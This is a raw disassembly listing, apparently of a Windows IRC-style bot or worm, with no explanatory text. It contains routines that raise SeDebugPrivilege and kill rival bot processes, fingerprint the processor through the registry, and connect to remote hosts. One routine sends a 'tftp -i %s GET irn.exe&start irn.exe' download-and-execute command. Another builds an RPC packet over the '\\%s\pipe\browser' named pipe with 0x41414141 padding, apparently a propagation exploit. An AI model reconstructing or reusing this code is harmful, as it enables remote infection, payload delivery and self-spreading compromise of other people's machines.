		push	offset aKernel32_dll_0 ; "kernel32.dll"
		mov	[esp+580h+var_54C], eax
		call	edi	; GetModuleHandleA
		mov	esi, ds:off_41E0E8
		push	eax
		call	esi ; sub_457FDC
		push	offset aOpenprocess ; "OpenProcess"
		push	offset aKernel32_dll_1 ; "kernel32.dll"
		mov	dword_4288E0, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_457FDC
		push	offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
		push	offset aKernel32_dll_2 ; "kernel32.dll"
		mov	dword_4288EC, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_457FDC
		push	offset aProcess32first ; "Process32First"
		push	offset aKernel32_dll_3 ; "kernel32.dll"
		mov	dword_4288D4, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_457FDC
		push	offset aProcess32next ;	"Process32Next"
		push	offset aKernel32_dll_4 ; "kernel32.dll"
		mov	dword_4288D8, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_457FDC
		push	offset aModule32first ;	"Module32First"
		push	offset aKernel32_dll_5 ; "kernel32.dll"
		mov	dword_4288DC, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_457FDC
		push	offset aModule32next ; "Module32Next"
		push	offset aKernel32_dll_6 ; "kernel32.dll"
		mov	dword_4288C8, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_457FDC
		push	offset aThread32first ;	"Thread32First"
		push	offset aKernel32_dll_7 ; "kernel32.dll"
		mov	dword_4288E4, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_457FDC
		push	offset aThread32next ; "Thread32Next"
		push	offset aKernel32_dll_8 ; "kernel32.dll"
		mov	dword_4288CC, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_457FDC
		push	offset aReadprocessmem ; "ReadProcessMemory"
		push	offset aKernel32_dll_9 ; "kernel32.dll"
		mov	dword_4288F0, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_457FDC
		push	offset aGetmodulefilen ; "GetModuleFileNameExA"
		push	offset aPsapi_dll ; "psapi.dll"
		mov	dword_4288D0, eax
		call	ds:off_41E0E4
		push	eax
		call	esi ; sub_457FDC
		cmp	dword_4288E0, ebx
		mov	dword_4288E8, eax
		jz	loc_41AFD7
		cmp	dword_4288EC, ebx
		jz	loc_41AFD7
		cmp	dword_4288D4, ebx
		jz	loc_41AFD7
		cmp	dword_4288D8, ebx
		jz	loc_41AFD7
		cmp	dword_4288DC, ebx
		jz	loc_41AFD7
		cmp	dword_4288C8, ebx
		jz	loc_41AFD7
		cmp	dword_4288E4, ebx
		jz	loc_41AFD7
		cmp	dword_4288CC, ebx
		jz	loc_41AFD7
		cmp	dword_4288F0, ebx
		jz	loc_41AFD7
		cmp	dword_4288D0, ebx
		jz	loc_41AFD7
		cmp	eax, ebx
		jz	loc_41AFD7
		mov	edi, 104h
		push	edi
		lea	eax, [esp+57Ch+var_318]
		push	eax
		call	ds:dword_41E0F0	; GetSystemDirectoryA
		lea	eax, [esp+578h+var_558]
		xor	esi, esi
		mov	[esp+578h+var_568], eax

loc_41ACF3:				; CODE XREF: sub_41AB0C+238j
		mov	ecx, [esp+578h+var_568]
		push	dword ptr [ecx]
		lea	ecx, [esp+57Ch+var_318]
		push	ecx
		push	offset aSS_2	; "%s\\%s"
		lea	eax, [esp+esi+584h+var_210]
		push	103h
		push	eax
		call	sub_40307C
		lea	eax, [esp+esi+58Ch+var_210]
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41AD25:				; CODE XREF: sub_41AB0C+21Ej
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_41AD25
		add	[esp+578h+var_568], 4
		sub	eax, ecx
		add	eax, esi
		add	esi, edi
		cmp	esi, 30Ch
		mov	[esp+eax+578h+var_210],	bl
		jb	short loc_41ACF3

loc_41AD46:				; CODE XREF: sub_41AB0C+4C6j
		push	ebx
		push	0Fh
		mov	[esp+580h+var_548], 128h
		call	dword_4288D4
		lea	ecx, [esp+578h+var_548]
		push	ecx
		push	eax
		mov	[esp+580h+var_55C], eax
		call	dword_4288D8
		test	eax, eax
		jz	loc_41AFC7
		jmp	loc_41AFB0
; ---------------------------------------------------------------------------

loc_41AD74:				; CODE XREF: sub_41AB0C+4B5j
		mov	edi, ds:off_41E100
		lea	eax, [esp+578h+var_564]
		push	eax
		push	ebx
		push	28h
		mov	[esp+584h+var_569], 1
		call	edi ; sub_45A22C
		mov	esi, ds:off_41E038
		push	eax
		call	esi ; sub_43D0BE
		test	eax, eax
		jnz	short loc_41ADC8
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		cmp	eax, 3F0h
		jnz	short loc_41ADC4
		push	2
		call	ds:off_41E030
		test	eax, eax
		jnz	short loc_41ADB3
		mov	[esp+578h+var_569], bl

loc_41ADB3:				; CODE XREF: sub_41AB0C+2A1j
		lea	eax, [esp+578h+var_564]
		push	eax
		push	ebx
		push	28h
		call	edi ; sub_45A22C
		push	eax
		call	esi ; sub_43D0BE
		test	eax, eax
		jnz	short loc_41ADC8

loc_41ADC4:				; CODE XREF: sub_41AB0C+295j
		mov	[esp+578h+var_569], bl

loc_41ADC8:				; CODE XREF: sub_41AB0C+288j
					; sub_41AB0C+2B6j
		push	1
		push	offset aSedebugprivile ; "SeDebugPrivilege"
		push	[esp+580h+var_564]
		call	sub_41A4A1
		add	esp, 0Ch
		test	al, al
		jnz	short loc_41ADED
		push	[esp+578h+var_564]
		call	ds:off_41E0D8
		mov	[esp+578h+var_569], bl

loc_41ADED:				; CODE XREF: sub_41AB0C+2D1j
		push	[esp+578h+var_540]
		push	ebx
		push	1F0FFFh
		call	dword_4288EC
		cmp	eax, ebx
		mov	[esp+578h+var_568], eax
		jnz	short loc_41AE09
		mov	[esp+578h+var_569], bl

loc_41AE09:				; CODE XREF: sub_41AB0C+2F7j
		mov	esi, 104h
		push	esi
		lea	eax, [esp+57Ch+var_420]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 0Ch
		push	esi
		lea	eax, [esp+57Ch+var_420]
		push	eax
		push	ebx
		push	[esp+584h+var_568]
		call	dword_4288E8
		mov	[esp+578h+var_560], ebx
		lea	edi, [esp+578h+var_210]

loc_41AE3F:				; CODE XREF: sub_41AB0C+352j
		lea	eax, [esp+578h+var_420]
		push	eax
		push	edi
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_41AE62
		inc	[esp+578h+var_560]
		add	edi, esi
		cmp	[esp+578h+var_560], 3
		jb	short loc_41AE3F
		jmp	short loc_41AE66
; ---------------------------------------------------------------------------

loc_41AE62:				; CODE XREF: sub_41AB0C+345j
		mov	[esp+578h+var_569], bl

loc_41AE66:				; CODE XREF: sub_41AB0C+354j
		cmp	[esp+578h+var_569], bl
		jz	loc_41AF96
		push	ebx
		push	offset aSedebugprivi_0 ; "SeDebugPrivilege"
		push	[esp+580h+var_564]
		call	sub_41A4A1
		xor	eax, eax
		lea	edi, [esp+584h+var_558]
		stosd
		stosd
		mov	eax, [esp+584h+var_54C]
		add	esp, 0Ch
		cmp	[esp+578h+var_540], eax
		jz	loc_41AF96
		lea	eax, [esp+578h+var_524]
		push	offset aSystem	; "System"
		push	eax
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	loc_41AF96
		mov	esi, [esp+578h+var_540]
		push	ebx
		push	4
		call	dword_4288D4
		cmp	eax, 0FFFFFFFFh
		jz	loc_41AF96
		push	eax
		push	esi
		call	sub_41A618
		cmp	al, bl
		pop	ecx
		pop	ecx
		jz	loc_41AF96
		push	[esp+578h+var_540]
		lea	esi, [esp+57Ch+var_558]
		call	sub_41A67C
		test	al, al
		pop	ecx
		jz	loc_41AF7B
		push	[esp+578h+var_554]
		call	sub_402BD6
		cmp	eax, ebx
		pop	ecx
		jnz	short loc_41AEFF
		push	ebx
		jmp	short loc_41AF75
; ---------------------------------------------------------------------------

loc_41AEFF:				; CODE XREF: sub_41AB0C+3EEj
		push	eax
		push	[esp+57Ch+var_554]
		push	[esp+580h+var_558]
		push	[esp+584h+var_568]
		call	sub_41A53E
		add	esp, 10h
		cmp	al, bl
		jz	short loc_41AF7B
		push	100h
		call	sub_402BD6
		pop	ecx
		mov	esi, eax
		lea	eax, [esp+578h+var_524]
		push	eax
		lea	eax, [esp+57Ch+var_420]
		push	eax
		push	[esp+580h+var_568]
		call	sub_41AAC1
		add	esp, 0Ch
		test	al, al
		jz	short loc_41AF74
		push	esi
		call	sub_402FD3
		pop	ecx
		push	eax
		mov	ebx, offset aSiU ; "‘ғ"
		call	sub_41A33D
		pop	ecx
		lea	eax, [esp+578h+var_420]
		push	eax
		push	offset aBotKilledS ; "Bot Killed: %s"
		push	esi
		push	0
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 14h
		xor	ebx, ebx

loc_41AF74:				; CODE XREF: sub_41AB0C+434j
		push	esi

loc_41AF75:				; CODE XREF: sub_41AB0C+3F1j
		call	sub_403129
		pop	ecx

loc_41AF7B:				; CODE XREF: sub_41AB0C+3DCj
					; sub_41AB0C+40Aj
		mov	esi, [esp+578h+var_540]
		push	ebx
		push	4
		call	dword_4288D4
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41AF96
		push	eax
		push	esi
		call	sub_41A5B4
		pop	ecx
		pop	ecx

loc_41AF96:				; CODE XREF: sub_41AB0C+35Ej
					; sub_41AB0C+386j ...
		push	[esp+578h+var_564]
		mov	esi, ds:off_41E0D8
		call	esi ; sub_4497E8
		push	[esp+578h+var_568]
		call	esi ; sub_4497E8
		push	1
		call	ds:off_41E0F8

loc_41AFB0:				; CODE XREF: sub_41AB0C+263j
		lea	eax, [esp+578h+var_548]
		push	eax
		push	[esp+57Ch+var_55C]
		call	dword_4288DC
		test	eax, eax
		jnz	loc_41AD74

loc_41AFC7:				; CODE XREF: sub_41AB0C+25Dj
		push	927C0h
		call	ds:off_41E0F8
		jmp	loc_41AD46
; ---------------------------------------------------------------------------

loc_41AFD7:				; CODE XREF: sub_41AB0C+14Fj
					; sub_41AB0C+15Bj ...
		call	ds:dword_41E0DC	; GetCurrentThreadId
		push	eax
		call	sub_414CA5
		pop	ecx
		mov	ecx, [esp+578h+var_4]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	4
sub_41AB0C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41AFFD	proc near		; CODE XREF: sub_41B13F+98p

var_5B4		= word ptr -5B4h
var_5B2		= word ptr -5B2h
var_5B0		= dword	ptr -5B0h
var_5A4		= byte ptr -5A4h
var_5A3		= byte ptr -5A3h
var_1A4		= byte ptr -1A4h
var_1A3		= byte ptr -1A3h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 5B4h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	edi
		xor	ebx, ebx
		push	3FFh
		lea	eax, [ebp+var_5A3]
		push	ebx
		push	eax
		mov	[ebp+var_5A4], bl
		call	sub_408130
		push	18Fh
		lea	eax, [ebp+var_1A3]
		push	ebx
		push	eax
		mov	[ebp+var_1A4], bl
		call	sub_408130
		xor	eax, eax
		mov	[ebp+var_14], bl
		lea	edi, [ebp+var_13]
		stosd
		stosd
		stosd
		stosw
		stosb
		xor	eax, eax
		lea	edi, [ebp+var_5B4]
		stosd
		stosd
		stosd
		stosd
		mov	eax, [ebp+arg_0]
		add	esp, 18h
		push	216Bh
		mov	[ebp+var_5B4], 2
		mov	[ebp+var_5B0], eax
		call	ds:dword_41E270	; htons
		push	ebx
		push	1
		push	2
		mov	[ebp+var_5B2], ax
		call	ds:dword_41E220	; socket
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_41B0AE
		push	eax

loc_41B098:				; CODE XREF: sub_41AFFD+C7j
		call	ds:dword_41E280	; closesocket
		xor	al, al

loc_41B0A0:				; CODE XREF: sub_41AFFD+139j
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
; ---------------------------------------------------------------------------

loc_41B0AE:				; CODE XREF: sub_41AFFD+98j
		push	10h
		lea	eax, [ebp+var_5B4]
		push	eax
		push	edi
		call	ds:dword_41E23C	; connect
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_41B0C6
		push	edi
		jmp	short loc_41B098
; ---------------------------------------------------------------------------

loc_41B0C6:				; CODE XREF: sub_41AFFD+C4j
		push	esi
		push	ebx
		push	400h
		lea	eax, [ebp+var_5A4]
		push	eax
		push	edi
		call	ds:dword_41E26C	; recv
		push	dword_428D1C
		lea	esi, [ebp+var_14]
		call	sub_419C46
		mov	eax, esi
		push	eax
		push	offset aTftpISGetIrn_e ; "tftp -i %s GET irn.exe&start irn.exe&ex"...
		lea	eax, [ebp+var_1A4]
		push	18Fh
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_1A4]
		add	esp, 14h
		lea	esi, [eax+1]

loc_41B10E:				; CODE XREF: sub_41AFFD+116j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41B10E
		push	ebx
		sub	eax, esi
		push	eax
		lea	eax, [ebp+var_1A4]
		push	eax
		push	edi
		call	ds:dword_41E228	; send
		cmp	eax, 0FFFFFFFFh
		pop	esi
		jnz	short loc_41B13B

loc_41B12D:				; CODE XREF: sub_41AFFD+140j
		push	edi
		call	ds:dword_41E280	; closesocket
		mov	al, bl
		jmp	loc_41B0A0
; ---------------------------------------------------------------------------

loc_41B13B:				; CODE XREF: sub_41AFFD+12Ej
		mov	bl, 1
		jmp	short loc_41B12D
sub_41AFFD	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41B13F	proc near		; DATA XREF: .data:004255A8o

var_124		= byte ptr -124h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_14		= word ptr -14h
var_12		= word ptr -12h
var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_0		= byte ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 124h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		push	edi
		push	44h
		pop	ecx
		lea	esi, [ebp+arg_0]
		lea	edi, [ebp+var_124]
		rep movsd
		mov	edi, [ebp+var_20]
		push	[ebp+var_1C]
		mov	[ebp+var_14], 2
		mov	[ebp+var_10], edi
		call	ds:dword_41E270	; htons
		push	6
		push	1
		push	2
		mov	[ebp+var_12], ax
		call	ds:dword_41E220	; socket
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		jz	short loc_41B1A7
		push	10h
		lea	eax, [ebp+var_14]
		push	eax
		push	esi
		call	ds:dword_41E23C	; connect
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_41B1B7
		push	esi

loc_41B1A1:				; CODE XREF: sub_41B13F+8Fj
		call	ds:dword_41E280	; closesocket

loc_41B1A7:				; CODE XREF: sub_41B13F+4Dj
					; sub_41B13F+A0j
		xor	al, al

loc_41B1A9:				; CODE XREF: sub_41B13F+B2j
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		leave
		retn
; ---------------------------------------------------------------------------

loc_41B1B7:				; CODE XREF: sub_41B13F+5Fj
		push	0
		push	1213h
		push	offset dword_4255E0
		push	esi
		call	ds:dword_41E228	; send
		cmp	eax, 0FFFFFFFFh
		push	esi
		jz	short loc_41B1A1
		call	ds:dword_41E280	; closesocket
		push	edi
		call	sub_41AFFD
		test	al, al
		pop	ecx
		jz	short loc_41B1A7
		mov	eax, [ebp+var_24]
		imul	eax, 2Ch
		lea	eax, dword_42554C[eax]
		inc	dword ptr [eax]
		mov	al, 1
		jmp	short loc_41B1A9
sub_41B13F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=2C4h


sub_41B1F3	proc near		; CODE XREF: sub_402129+E0p

var_344		= dword	ptr -344h
var_340		= dword	ptr -340h
var_33C		= dword	ptr -33Ch
var_335		= byte ptr -335h
var_334		= byte ptr -334h
var_234		= byte ptr -234h
var_134		= byte ptr -134h
var_133		= byte ptr -133h
var_34		= byte ptr -34h
var_4		= dword	ptr -4

		push	ebp
		lea	ebp, [esp-2C4h]
		sub	esp, 344h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+2C4h+var_4], eax
		push	ebx
		push	esi
		push	edi
		push	0Bh
		pop	ecx
		mov	esi, offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
		lea	edi, [ebp+2C4h+var_34]
		rep movsd
		movsw
		mov	ebx, 100h
		movsb
		push	ebx
		xor	esi, esi
		lea	eax, [ebp+2C4h+var_334]
		push	esi
		push	eax
		call	sub_408130
		push	4
		push	offset dword_428F50
		push	offset aMhz	; "~MHz"
		lea	eax, [ebp+2C4h+var_34]
		push	eax
		push	4
		call	sub_417B4D
		add	esp, 20h
		test	al, al
		jz	loc_41B40B
		push	ebx
		lea	eax, [ebp+2C4h+var_334]
		push	eax
		push	offset aProcessornames ; "ProcessorNameString"
		lea	eax, [ebp+2C4h+var_34]
		push	eax
		push	1
		call	sub_417B4D
		add	esp, 14h
		test	al, al
		jz	loc_41B34B
		mov	edi, 0FFh
		push	edi
		lea	eax, [ebp+2C4h+var_133]
		push	esi
		push	eax
		mov	[ebp+2C4h+var_335], 0
		mov	[ebp+2C4h+var_134], 0
		call	sub_408130
		lea	eax, [ebp+2C4h+var_334]
		push	eax
		push	offset aS_8	; "%s"
		lea	eax, [ebp+2C4h+var_134]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+2C4h+var_134]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_41B2BE:				; CODE XREF: sub_41B1F3+D0j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41B2BE
		sub	eax, esi
		push	ebx
		push	0
		mov	esi, offset byte_428E50
		push	esi
		mov	[ebp+eax+2C4h+var_134],	cl
		call	sub_408130
		add	esp, 0Ch
		xor	ecx, ecx
		mov	[ebp+2C4h+var_33C], ecx

loc_41B2E4:				; CODE XREF: sub_41B1F3+154j
		cmp	[ebp+2C4h+var_335], 0
		jnz	short loc_41B2FB
		cmp	[ebp+ecx+2C4h+var_134],	20h
		jz	short loc_41B32B
		mov	[ebp+2C4h+var_335], 1
		dec	ecx
		jmp	short loc_41B32B
; ---------------------------------------------------------------------------

loc_41B2FB:				; CODE XREF: sub_41B1F3+F5j
		movsx	eax, [ebp+ecx+2C4h+var_134]
		push	eax
		push	esi
		push	offset aSC_0	; "%s%c"
		push	edi
		push	esi
		call	sub_40307C
		mov	eax, esi
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41B319:				; CODE XREF: sub_41B1F3+12Bj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41B319
		sub	eax, ecx
		mov	ecx, [ebp+2C4h+var_33C]
		mov	byte_428E50[eax], dl

loc_41B32B:				; CODE XREF: sub_41B1F3+FFj
					; sub_41B1F3+106j
		lea	eax, [ebp+2C4h+var_134]
		inc	ecx
		lea	edx, [eax+1]
		mov	[ebp+2C4h+var_33C], ecx
		mov	[ebp+2C4h+var_344], edx

loc_41B33B:				; CODE XREF: sub_41B1F3+14Dj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41B33B
		sub	eax, [ebp+2C4h+var_344]
		cmp	ecx, eax
		jbe	short loc_41B2E4
		jmp	short loc_41B37E
; ---------------------------------------------------------------------------

loc_41B34B:				; CODE XREF: sub_41B1F3+85j
		push	ebx
		push	esi
		mov	esi, offset byte_428E50
		push	esi
		call	sub_408130
		push	offset aUnknown	; "Unknown"
		mov	edi, 0FFh
		push	edi
		push	esi
		call	sub_40307C
		add	esp, 18h
		lea	eax, [esi+1]

loc_41B36F:				; CODE XREF: sub_41B1F3+181j
		mov	cl, [esi]
		inc	esi
		test	cl, cl
		jnz	short loc_41B36F
		sub	esi, eax
		mov	byte_428E50[esi], cl

loc_41B37E:				; CODE XREF: sub_41B1F3+156j
		and	dword_428F54, 0
		mov	[ebp+2C4h+var_33C], 1

loc_41B38C:				; CODE XREF: sub_41B1F3+20Dj
		inc	dword_428F54
		push	ebx
		lea	eax, [ebp+2C4h+var_234]
		push	0
		push	eax
		call	sub_408130
		push	[ebp+2C4h+var_33C]
		lea	eax, [ebp+2C4h+var_234]
		push	offset aHardwareDesc_0 ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+2C4h+var_234]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_41B3C2:				; CODE XREF: sub_41B1F3+1D4j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41B3C2
		sub	eax, esi
		mov	[ebp+eax+2C4h+var_234],	cl
		lea	eax, [ebp+2C4h+var_340]
		push	eax
		push	1
		push	0
		lea	eax, [ebp+2C4h+var_234]
		push	eax
		push	80000002h
		call	ds:off_41E02C
		test	eax, eax
		jnz	short loc_41B402
		push	[ebp+2C4h+var_340]
		call	ds:off_41E010
		inc	[ebp+2C4h+var_33C]
		cmp	[ebp+2C4h+var_33C], 8
		jb	short loc_41B38C

loc_41B402:				; CODE XREF: sub_41B1F3+1FBj
		push	[ebp+2C4h+var_340]
		call	ds:off_41E010

loc_41B40B:				; CODE XREF: sub_41B1F3+62j
		mov	ecx, [ebp+2C4h+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 2C4h
		leave
		retn
sub_41B1F3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41B423	proc near		; CODE XREF: sub_413FED+1FEp
					; sub_413FED+301p ...

var_C		= dword	ptr -0Ch
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_1C		= dword	ptr  24h
arg_20		= dword	ptr  28h
arg_28		= dword	ptr  30h
arg_2C		= dword	ptr  34h
arg_30		= dword	ptr  38h
arg_34		= dword	ptr  3Ch
arg_3C		= dword	ptr  44h
arg_40		= byte ptr  48h
arg_4C		= dword	ptr  54h
arg_50		= byte ptr  58h
arg_54		= byte ptr  5Ch
arg_68		= dword	ptr  70h
arg_78		= dword	ptr  80h
arg_7C		= word ptr  84h
arg_80		= dword	ptr  88h
arg_84		= word ptr  8Ch
arg_88		= dword	ptr  90h
arg_8C		= dword	ptr  94h
arg_90		= word ptr  98h
arg_94		= byte ptr  9Ch
arg_98		= dword	ptr  0A0h
arg_9C		= dword	ptr  0A4h
arg_A0		= dword	ptr  0A8h
arg_A4		= dword	ptr  0ACh
arg_A8		= byte ptr  0B0h
arg_AC		= word ptr  0B4h
arg_AE		= word ptr  0B6h
arg_B0		= dword	ptr  0B8h
arg_B4		= word ptr  0BCh
arg_B6		= word ptr  0BEh
arg_B8		= dword	ptr  0C0h
arg_BC		= dword	ptr  0C4h
arg_C0		= word ptr  0C8h
arg_C2		= byte ptr  0CAh
arg_C4		= byte ptr  0CCh
arg_D4		= dword	ptr  0DCh
arg_D8		= byte ptr  0E0h
arg_E8		= dword	ptr  0F0h
arg_EC		= byte ptr  0F4h
arg_1EC		= dword	ptr  1F4h
arg_1F0		= dword	ptr  1F8h
arg_1F8		= dword	ptr  200h
arg_200		= byte ptr  208h
arg_201		= byte ptr  209h
arg_210		= byte ptr  218h
arg_211		= byte ptr  219h
arg_310		= byte ptr  318h
arg_311		= byte ptr  319h
arg_40C		= byte ptr  414h
arg_240C	= byte ptr  2414h
arg_4410	= byte ptr  4418h
arg_6410	= dword	ptr  6418h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		mov	eax, 641Ch
		call	sub_4119C0
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+arg_6410],	eax
		push	ebx
		push	esi
		push	edi
		push	44h
		pop	ecx
		lea	esi, [ebp+arg_0]
		lea	edi, [esp+0Ch+arg_EC]
		rep movsd
		mov	eax, [esp+0Ch+arg_1F0]
		push	eax
		mov	[esp+10h+arg_20], eax
		call	ds:dword_41E25C	; inet_ntoa
		xor	ebx, ebx
		mov	[esp+0Ch+arg_14], eax
		mov	[esp+0Ch+arg_8], ebx

loc_41B46F:				; CODE XREF: sub_41B423+697j
		cmp	[esp+0Ch+arg_8], 2
		ja	loc_41BAC9
		push	offset dword_41FFF8
		push	[esp+10h+arg_14]
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_41B4E2
		push	[esp+0Ch+arg_14]
		lea	eax, [esp+10h+arg_40C]
		push	offset dword_41FFFC
		push	2000h
		push	eax
		call	sub_40307C
		add	esp, 10h
		push	8
		pop	ecx
		xor	eax, eax
		push	ebx
		lea	edi, [esp+10h+arg_54]
		rep stosd
		lea	eax, [esp+10h+arg_40C]
		push	offset byte_41FF0E
		mov	[esp+14h+arg_68], eax
		push	offset byte_41FF0F
		lea	eax, [esp+18h+arg_54]
		push	eax
		call	sub_402BD0
		test	eax, eax
		jnz	loc_41BAC9

loc_41B4E2:				; CODE XREF: sub_41B423+69j
		push	[esp+0Ch+arg_14]
		lea	eax, [esp+10h+arg_240C]
		push	offset aSPipeBrowser ; "\\\\%s\\pipe\\browser"
		push	2000h
		push	eax
		call	sub_40307C
		add	esp, 10h
		push	ebx
		push	40000000h
		push	3
		push	ebx
		push	3
		push	0C0000000h
		lea	eax, [esp+24h+arg_240C]
		push	eax
		call	ds:off_41E06C
		cmp	eax, 0FFFFFFFFh
		mov	[esp+0Ch+arg_0], eax
		jz	loc_41BAC9
		push	48h
		lea	eax, [esp+10h+arg_A4]
		push	ebx
		push	eax
		call	sub_408130
		mov	byte ptr [esp+18h+arg_A4], 5
		mov	byte ptr [esp+18h+arg_A4+1], bl
		mov	byte ptr [esp+18h+arg_A4+2], 0Bh
		mov	byte ptr [esp+18h+arg_A4+3], 3
		mov	dword ptr [esp+18h+arg_A8], 10h
		mov	[esp+18h+arg_AC], 48h
		mov	[esp+18h+arg_AE], bx
		mov	[esp+18h+arg_B0], ebx
		mov	[esp+18h+arg_B4], 10B8h
		mov	[esp+18h+arg_B6], 10B8h
		mov	[esp+18h+arg_B8], ebx
		mov	[esp+18h+arg_BC], 1
		mov	[esp+18h+arg_C0], bx
		mov	[esp+18h+arg_C2], 1
		mov	esi, offset dword_42001C
		lea	edi, [esp+18h+arg_C4]
		movsd
		movsd
		movsd
		movsd
		mov	[esp+18h+arg_D4], 3
		mov	esi, offset dword_420030
		lea	edi, [esp+18h+arg_D8]
		movsd
		movsd
		add	esp, 0Ch
		movsd
		push	2
		movsd
		pop	esi
		push	ebx
		lea	eax, [esp+10h+arg_50]
		push	eax
		push	48h
		lea	eax, [esp+18h+arg_A4]
		push	eax
		push	[esp+1Ch+arg_0]
		mov	[esp+20h+arg_E8], esi
		call	ds:off_41E088
		test	eax, eax
		jz	loc_41BABF
		push	ebx
		lea	eax, [esp+0Ch+arg_20]
		push	eax
		push	2000h
		lea	eax, [esp+14h+arg_4410]
		push	eax
		push	[esp+18h+arg_4]
		call	ds:off_41E078
		call	ds:dword_41E104	; GetTickCount
		push	eax
		call	sub_4038E4
		mov	edx, 41414141h
		mov	eax, edx
		lea	edi, [esp+0Ch+arg_94]
		stosd
		stosd
		stosd
		stosd
		pop	ecx
		stosd
		push	7
		pop	ecx
		mov	eax, edx
		lea	edi, [esp+8+arg_78]
		rep stosd
		call	sub_4038F1
		mov	dword ptr [esp+8+arg_94], eax
		xor	eax, eax
		inc	eax
		cmp	[esp+8+arg_C], eax
		mov	[esp+8+arg_A0],	eax
		mov	[esp+8+arg_9C],	ebx
		mov	[esp+8+arg_98],	eax
		mov	word ptr [esp+8+arg_A4], bx
		jnz	short loc_41B6A2
		mov	dword ptr [esp+8+arg_84], eax
		mov	dword ptr [esp+8+arg_7C], eax
		mov	[esp+8+arg_88],	ebx
		jmp	short loc_41B6C1
; ---------------------------------------------------------------------------

loc_41B6A2:				; CODE XREF: sub_41B423+266j
		cmp	[esp+8+arg_C], ebx
		jnz	short loc_41B6C8
		mov	dword ptr [esp+8+arg_84], esi
		mov	dword ptr [esp+8+arg_7C], esi
		mov	[esp+8+arg_88],	2EBh

loc_41B6C1:				; CODE XREF: sub_41B423+27Dj
		mov	[esp+8+arg_80],	ebx

loc_41B6C8:				; CODE XREF: sub_41B423+283j
		call	sub_4038F1
		cdq
		mov	esi, 0FAh
		mov	ecx, esi
		idiv	ecx
		inc	edx
		mov	[esp+8+arg_78],	edx
		call	sub_4038F1
		cdq
		idiv	esi
		mov	eax, [esp+8+arg_C]
		shl	eax, 4
		mov	edi, dword_426808[eax]
		push	edi
		mov	dword ptr [esp+0Ch+arg_90], ebx
		mov	[esp+0Ch+arg_1C], eax
		mov	[esp+0Ch+arg_10], edi
		inc	edx
		mov	[esp+0Ch+arg_8C], edx
		call	sub_403C6E
		mov	esi, eax
		cmp	esi, ebx
		pop	ecx
		mov	[esp+8+arg_8], esi
		jz	loc_41BABF
		lea	eax, [edi-2]
		push	eax
		push	90h
		push	esi
		call	sub_408130
		lea	edi, [esi+edi-2]
		xor	eax, eax
		stosw
		mov	eax, [esp+14h+arg_1C]
		mov	eax, dword_426810[eax]
		lea	edi, [eax+esi]
